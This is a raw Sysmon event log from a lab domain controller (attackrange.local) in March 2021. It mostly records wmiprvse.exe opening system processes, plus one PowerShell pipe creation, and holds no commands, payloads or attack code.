16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.073{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.072{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.071{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002236748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:52.071{05ADC7E1-6D63-603E-72AA-00000000AD01}6720\PSHost.132591775719343073.6720.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002236747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.071{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.070{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.070{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.069{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.068{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.067{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.067{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.067{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-75AA-00000000AD01}3024C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.067{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-75AA-00000000AD01}3024C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.066{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 